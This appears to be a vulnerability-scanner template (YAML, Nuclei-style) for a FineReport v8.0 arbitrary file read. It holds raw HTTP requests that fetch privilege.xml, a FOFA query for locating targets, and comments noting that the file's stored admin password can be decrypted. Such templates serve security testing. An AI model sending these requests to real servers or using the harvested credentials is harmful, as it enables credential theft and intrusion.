mirror of
https://github.com/SleepingBag945/dddd.git
synced 2025-06-10 02:03:07 +00:00
34 lines
1.1 KiB
YAML
34 lines
1.1 KiB
YAML
id: finereport-v8-arbitrary-file-read
|
|
|
|
info:
|
|
name: FineReport v8.0 Arbitrary file read
|
|
author: SleepingBag945
|
|
severity: high
|
|
description: |
|
|
There is an arbitrary file reading vulnerability in finereport v8.0, which can be used by attackers to read arbitrary files.<br>
|
|
metadata:
|
|
fofa-query: app="fanruansem-FineReport"
|
|
tags: Disclosure of Sensitive Information
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
|
|
- |
|
|
GET /ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_1 == 200 && contains(body_1,"CDATA")'
|
|
- 'status_code_2 == 200 && contains(body_2,"CDATA")'
|
|
condition: or
|
|
|
|
#http://wiki.peiqi.tech/wiki/oa/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20V8%20get_geo_json%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html
|
|
#其中的privilege.xml里面存储了后台的用户名密码
|
|
#解密后可得到登录密码 |